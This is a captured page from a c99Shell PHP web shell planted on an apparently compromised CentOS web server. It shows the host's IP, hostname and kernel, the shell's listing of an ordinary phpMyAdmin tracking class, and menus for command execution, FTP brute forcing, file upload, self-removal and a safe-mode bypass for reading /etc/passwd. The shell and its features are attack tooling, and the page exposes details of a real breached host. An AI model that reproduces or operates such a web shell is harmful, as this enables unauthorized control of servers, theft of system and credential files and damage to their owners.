110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/phpMyAdmin/libraries/ drwxr-xr-x Free 52.34 GB of 127.8 GB (40.96%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/libraries/ drwxr-xr-x
Free 52.34 GB of 127.8 GB (40.96%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: Tracker.class.php (29.08 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

$columns, 'INDEXES' => $indexes); $snapshot = serialize($snapshot); // Get DROP TABLE / DROP VIEW and CREATE TABLE SQL statements $sql_backquotes = true; $create_sql = ""; if (self::$add_drop_table == true && $is_view == false) { $create_sql .= self::getLogComment() . self::getStatementDropTable(PMA_backquote($tablename)) . ";\n"; } if (self::$add_drop_view == true && $is_view == true) { $create_sql .= self::getLogComment() . self::getStatementDropView(PMA_backquote($tablename)) . ";\n"; } $create_sql .= self::getLogComment() . PMA_getTableDef($dbname, $tablename, "\n", ""); // Save version $sql_query = "/*NOTRACK*/\n" . "INSERT INTO" . self::$pma_table . " (" . "db_name, " . "table_name, " . "version, " . "date_created, " . "date_updated, " . "schema_snapshot, " . "schema_sql, " . "data_sql, " . "tracking " . ") " . "values ( '" . PMA_sqlAddslashes($dbname) . "', '" . PMA_sqlAddslashes($tablename) . "', '" . PMA_sqlAddslashes($version) . "', '" . PMA_sqlAddslashes($date) . "', '" . PMA_sqlAddslashes($date) . "', '" . PMA_sqlAddslashes($snapshot) . "', '" . PMA_sqlAddslashes($create_sql) . "', '" . PMA_sqlAddslashes("\n") . "', '" . PMA_sqlAddslashes($tracking_set) . "' )"; $result = PMA_query_as_controluser($sql_query); if ($result) { // Deactivate previous version self::deactivateTracking($dbname, $tablename, ($version - 1)); } return $result; } /** * Removes all tracking data for a table * * @static * * @param string $dbname name of database * @param string $tablename name of table * * @return int result of version insertion */ static public function deleteTracking($dbname, $tablename) { $sql_query = "/*NOTRACK*/\n" . "DELETE FROM " . self::$pma_table . " WHERE `db_name` = '" . PMA_sqlAddslashes($dbname) . "' AND `table_name` = '" . PMA_sqlAddslashes($tablename) . "'"; $result = PMA_query_as_controluser($sql_query); return $result; } /** * Creates tracking version of a database * (in other words: create a job to track future changes on the database). * * @static * * @param string $dbname name of database * @param string $version version * @param string $query query * @param string $tracking_set set of tracking statements * * @return int result of version insertion */ static public function createDatabaseVersion($dbname, $version, $query, $tracking_set = 'CREATE DATABASE,ALTER DATABASE,DROP DATABASE') { global $sql_backquotes; $date = date('Y-m-d H:i:s'); if ($tracking_set == '') { $tracking_set = self::$default_tracking_set; } require_once './libraries/export/sql.php'; $create_sql = ""; if (self::$add_drop_database == true) { $create_sql .= self::getLogComment() . self::getStatementDropDatabase(PMA_backquote($dbname)) . ";\n"; } $create_sql .= self::getLogComment() . $query; // Save version $sql_query = "/*NOTRACK*/\n" . "INSERT INTO" . self::$pma_table . " (" . "db_name, " . "table_name, " . "version, " . "date_created, " . "date_updated, " . "schema_snapshot, " . "schema_sql, " . "data_sql, " . "tracking " . ") " . "values ( '" . PMA_sqlAddslashes($dbname) . "', '" . PMA_sqlAddslashes('') . "', '" . PMA_sqlAddslashes($version) . "', '" . PMA_sqlAddslashes($date) . "', '" . PMA_sqlAddslashes($date) . "', '" . PMA_sqlAddslashes('') . "', '" . PMA_sqlAddslashes($create_sql) . "', '" . PMA_sqlAddslashes("\n") . "', '" . PMA_sqlAddslashes($tracking_set) . "' )"; $result = PMA_query_as_controluser($sql_query); return $result; } /** * Changes tracking of a table. * * @static * * @param string $dbname name of database * @param string $tablename name of table * @param string $version version * @param integer $new_state the new state of tracking * * @return int result of SQL query */ static private function changeTracking($dbname, $tablename, $version, $new_state) { $sql_query = " UPDATE " . self::$pma_table . " SET `tracking_active` = '" . $new_state . "' " . " WHERE `db_name` = '" . PMA_sqlAddslashes($dbname) . "' " . " AND `table_name` = '" . PMA_sqlAddslashes($tablename) . "' " . " AND `version` = '" . PMA_sqlAddslashes($version) . "' "; $result = PMA_query_as_controluser($sql_query); return $result; } /** * Activates tracking of a table. * * @static * * @param string $dbname name of database * @param string $tablename name of table * @param string $version version * * @return int result of SQL query */ static public function activateTracking($dbname, $tablename, $version) { return self::changeTracking($dbname, $tablename, $version, 1); } /** * Deactivates tracking of a table. * * @static * * @param string $dbname name of database * @param string $tablename name of table * @param string $version version * * @return int result of SQL query */ static public function deactivateTracking($dbname, $tablename, $version) { return self::changeTracking($dbname, $tablename, $version, 0); } /** * Gets the newest version of a tracking job * (in other words: gets the HEAD version). * * @static * * @param string $dbname name of database * @param string $tablename name of table * @param string $statement tracked statement * * @return int (-1 if no version exists | > 0 if a version exists) */ static public function getVersion($dbname, $tablename, $statement = null) { $sql_query = " SELECT MAX(version) FROM " . self::$pma_table . " WHERE `db_name` = '" . PMA_sqlAddslashes($dbname) . "' " . " AND `table_name` = '" . PMA_sqlAddslashes($tablename) . "' "; if ($statement != "") { $sql_query .= " AND FIND_IN_SET('" . $statement . "',tracking) > 0" ; } $row = PMA_DBI_fetch_array(PMA_query_as_controluser($sql_query)); if (isset($row[0])) { $version = $row[0]; } if (! isset($version)) { $version = -1; } return $version; } /** * Gets the record of a tracking job. * * @static * * @param string $dbname name of database * @param string $tablename name of table * @param string $version version number * * @return mixed record DDM log, DDL log, structure snapshot, tracked statements. */ static public function getTrackedData($dbname, $tablename, $version) { if (! isset(self::$pma_table)) { self::init(); } $sql_query = " SELECT * FROM " . self::$pma_table . " WHERE `db_name` = '" . PMA_sqlAddslashes($dbname) . "' "; if (! empty($tablename)) { $sql_query .= " AND `table_name` = '" . PMA_sqlAddslashes($tablename) ."' "; } $sql_query .= " AND `version` = '" . PMA_sqlAddslashes($version) ."' ". " ORDER BY `version` DESC "; $mixed = PMA_DBI_fetch_array(PMA_query_as_controluser($sql_query)); // Parse log $log_schema_entries = explode('# log ', $mixed['schema_sql']); $log_data_entries = explode('# log ', $mixed['data_sql']); $ddl_date_from = $date = date('Y-m-d H:i:s'); $ddlog = array(); $i = 0; // Iterate tracked data definition statements // For each log entry we want to get date, username and statement foreach ($log_schema_entries as $log_entry) { if (trim($log_entry) != '') { $date = substr($log_entry, 0, 19); $username = substr($log_entry, 20, strpos($log_entry, "\n") - 20); if ($i == 0) { $ddl_date_from = $date; } $statement = rtrim(strstr($log_entry, "\n")); $ddlog[] = array( 'date' => $date, 'username'=> $username, 'statement' => $statement ); $i++; } } $date_from = $ddl_date_from; $date_to = $ddl_date_to = $date; $dml_date_from = $date_from; $dmlog = array(); $i = 0; // Iterate tracked data manipulation statements // For each log entry we want to get date, username and statement foreach ($log_data_entries as $log_entry) { if (trim($log_entry) != '') { $date = substr($log_entry, 0, 19); $username = substr($log_entry, 20, strpos($log_entry, "\n") - 20); if ($i == 0) { $dml_date_from = $date; } $statement = rtrim(strstr($log_entry, "\n")); $dmlog[] = array( 'date' => $date, 'username' => $username, 'statement' => $statement ); $i++; } } $dml_date_to = $date; // Define begin and end of date range for both logs if (strtotime($ddl_date_from) <= strtotime($dml_date_from)) { $data['date_from'] = $ddl_date_from; } else { $data['date_from'] = $dml_date_from; } if (strtotime($ddl_date_to) >= strtotime($dml_date_to)) { $data['date_to'] = $ddl_date_to; } else { $data['date_to'] = $dml_date_to; } $data['ddlog'] = $ddlog; $data['dmlog'] = $dmlog; $data['tracking'] = $mixed['tracking']; $data['schema_snapshot'] = $mixed['schema_snapshot']; return $data; } /** * Parses a query. Gets * - statement identifier (UPDATE, ALTER TABLE, ...) * - type of statement, is it part of DDL or DML ? * - tablename * * @static * @todo: using PMA SQL Parser when possible * @todo: support multi-table/view drops * * @param string $query * * @return mixed Array containing identifier, type and tablename. * */ static public function parseQuery($query) { // Usage of PMA_SQP does not work here // // require_once("libraries/sqlparser.lib.php"); // $parsed_sql = PMA_SQP_parse($query); // $sql_info = PMA_SQP_analyze($parsed_sql); $query = str_replace("\n", " ", $query); $query = str_replace("\r", " ", $query); $query = trim($query); $query = trim($query, ' -'); $tokens = explode(" ", $query); $tokens = array_map('strtoupper', $tokens); // Parse USE statement, need it for SQL dump imports if (substr($query, 0, 4) == 'USE ') { $prefix = explode('USE ', $query); $GLOBALS['db'] = self::getTableName($prefix[1]); } /* * DDL statements */ $result['type'] = 'DDL'; // Parse CREATE VIEW statement if (in_array('CREATE', $tokens) == true && in_array('VIEW', $tokens) == true && in_array('AS', $tokens) == true) { $result['identifier'] = 'CREATE VIEW'; $index = array_search('VIEW', $tokens); $result['tablename'] = strtolower(self::getTableName($tokens[$index + 1])); } // Parse ALTER VIEW statement if (in_array('ALTER', $tokens) == true && in_array('VIEW', $tokens) == true && in_array('AS', $tokens) == true && ! isset($result['identifier'])) { $result['identifier'] = 'ALTER VIEW'; $index = array_search('VIEW', $tokens); $result['tablename'] = strtolower(self::getTableName($tokens[$index + 1])); } // Parse DROP VIEW statement if (! isset($result['identifier']) && substr($query, 0, 10) == 'DROP VIEW ') { $result['identifier'] = 'DROP VIEW'; $prefix = explode('DROP VIEW ', $query); $str = strstr($prefix[1], 'IF EXISTS'); if ($str == FALSE ) { $str = $prefix[1]; } $result['tablename'] = self::getTableName($str); } // Parse CREATE DATABASE statement if (! isset($result['identifier']) && substr($query, 0, 15) == 'CREATE DATABASE') { $result['identifier'] = 'CREATE DATABASE'; $str = str_replace('CREATE DATABASE', '', $query); $str = str_replace('IF NOT EXISTS', '', $str); $prefix = explode('DEFAULT ', $str); $result['tablename'] = ''; $GLOBALS['db'] = self::getTableName($prefix[0]); } // Parse ALTER DATABASE statement if (! isset($result['identifier']) && substr($query, 0, 14) == 'ALTER DATABASE') { $result['identifier'] = 'ALTER DATABASE'; $result['tablename'] = ''; } // Parse DROP DATABASE statement if (! isset($result['identifier']) && substr($query, 0, 13) == 'DROP DATABASE') { $result['identifier'] = 'DROP DATABASE'; $str = str_replace('DROP DATABASE', '', $query); $str = str_replace('IF EXISTS', '', $str); $GLOBALS['db'] = self::getTableName($str); $result['tablename'] = ''; } // Parse CREATE TABLE statement if (! isset($result['identifier']) && substr($query, 0, 12) == 'CREATE TABLE' ) { $result['identifier'] = 'CREATE TABLE'; $query = str_replace('IF NOT EXISTS', '', $query); $prefix = explode('CREATE TABLE ', $query); $suffix = explode('(', $prefix[1]); $result['tablename'] = self::getTableName($suffix[0]); } // Parse ALTER TABLE statement if (! isset($result['identifier']) && substr($query, 0, 12) == 'ALTER TABLE ') { $result['identifier'] = 'ALTER TABLE'; $prefix = explode('ALTER TABLE ', $query); $suffix = explode(' ', $prefix[1]); $result['tablename'] = self::getTableName($suffix[0]); } // Parse DROP TABLE statement if (! isset($result['identifier']) && substr($query, 0, 11) == 'DROP TABLE ') { $result['identifier'] = 'DROP TABLE'; $prefix = explode('DROP TABLE ', $query); $str = strstr($prefix[1], 'IF EXISTS'); if ($str == FALSE ) { $str = $prefix[1]; } $result['tablename'] = self::getTableName($str); } // Parse CREATE INDEX statement if (! isset($result['identifier']) && ( substr($query, 0, 12) == 'CREATE INDEX' || substr($query, 0, 19) == 'CREATE UNIQUE INDEX' || substr($query, 0, 20) == 'CREATE SPATIAL INDEX' ) ) { $result['identifier'] = 'CREATE INDEX'; $prefix = explode('ON ', $query); $suffix = explode('(', $prefix[1]); $result['tablename'] = self::getTableName($suffix[0]); } // Parse DROP INDEX statement if (! isset($result['identifier']) && substr($query, 0, 10) == 'DROP INDEX') { $result['identifier'] = 'DROP INDEX'; $prefix = explode('ON ', $query); $result['tablename'] = self::getTableName($prefix[1]); } // Parse RENAME TABLE statement if (! isset($result['identifier']) && substr($query, 0, 13) == 'RENAME TABLE ') { $result['identifier'] = 'RENAME TABLE'; $prefix = explode('RENAME TABLE ', $query); $names = explode(' TO ', $prefix[1]); $result['tablename'] = self::getTableName($names[0]); $result["tablename_after_rename"] = self::getTableName($names[1]); } /* * DML statements */ if (! isset($result['identifier'])) { $result["type"] = 'DML'; } // Parse UPDATE statement if (! isset($result['identifier']) && substr($query, 0, 6) == 'UPDATE') { $result['identifier'] = 'UPDATE'; $prefix = explode('UPDATE ', $query); $suffix = explode(' ', $prefix[1]); $result['tablename'] = self::getTableName($suffix[0]); } // Parse INSERT INTO statement if (! isset($result['identifier']) && substr($query, 0, 11 ) == 'INSERT INTO') { $result['identifier'] = 'INSERT'; $prefix = explode('INSERT INTO', $query); $suffix = explode('(', $prefix[1]); $result['tablename'] = self::getTableName($suffix[0]); } // Parse DELETE statement if (! isset($result['identifier']) && substr($query, 0, 6 ) == 'DELETE') { $result['identifier'] = 'DELETE'; $prefix = explode('FROM ', $query); $suffix = explode(' ', $prefix[1]); $result['tablename'] = self::getTableName($suffix[0]); } // Parse TRUNCATE statement if (! isset($result['identifier']) && substr($query, 0, 8 ) == 'TRUNCATE') { $result['identifier'] = 'TRUNCATE'; $prefix = explode('TRUNCATE', $query); $result['tablename'] = self::getTableName($prefix[1]); } return $result; } /** * Analyzes a given SQL statement and saves tracking data. * * * @static * @param string $query a SQL query */ static public function handleQuery($query) { // If query is marked as untouchable, leave if (strstr($query, "/*NOTRACK*/")) { return false; } if (! (substr($query, -1) == ';')) { $query = $query . ";\n"; } // Get some information about query $result = self::parseQuery($query); // Get database name $dbname = trim($GLOBALS['db'], '`'); // $dbname can be empty, for example when coming from Synchronize // and this is a query for the remote server if (empty($dbname)) { return false; } // If we found a valid statement if (isset($result['identifier'])) { $version = self::getVersion($dbname, $result['tablename'], $result['identifier']); // If version not exists and auto-creation is enabled if (self::$version_auto_create == true && self::isTracked($dbname, $result['tablename']) == false && $version == -1) { // Create the version switch ($result['identifier']) { case 'CREATE TABLE': self::createVersion($dbname, $result['tablename'], '1'); break; case 'CREATE VIEW': self::createVersion($dbname, $result['tablename'], '1', '', true); break; case 'CREATE DATABASE': self::createDatabaseVersion($dbname, '1', $query); break; } // end switch } // If version exists if (self::isTracked($dbname, $result['tablename']) && $version != -1) { if ($result['type'] == 'DDL') { $save_to = 'schema_sql'; } elseif ($result['type'] == 'DML') { $save_to = 'data_sql'; } else { $save_to = ''; } $date = date('Y-m-d H:i:s'); // Cut off `dbname`. from query $query = preg_replace('/`' . $dbname . '`\s?\./', '', $query); // Add log information $query = self::getLogComment() . $query ; // Mark it as untouchable $sql_query = " /*NOTRACK*/\n" . " UPDATE " . self::$pma_table . " SET " . PMA_backquote($save_to) ." = CONCAT( " . PMA_backquote($save_to) . ",'\n" . PMA_sqlAddslashes($query) . "') ," . " `date_updated` = '" . $date . "' "; // If table was renamed we have to change the tablename attribute in pma_tracking too if ($result['identifier'] == 'RENAME TABLE') { $sql_query .= ', `table_name` = \'' . PMA_sqlAddslashes($result['tablename_after_rename']) . '\' '; } // Save the tracking information only for // 1. the database // 2. the table / view // 3. the statements // we want to track $sql_query .= " WHERE FIND_IN_SET('" . $result['identifier'] . "',tracking) > 0" . " AND `db_name` = '" . PMA_sqlAddslashes($dbname) . "' " . " AND `table_name` = '" . PMA_sqlAddslashes($result['tablename']) . "' " . " AND `version` = '" . PMA_sqlAddslashes($version) . "' "; $result = PMA_query_as_controluser($sql_query); } } } } ?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0056 ]--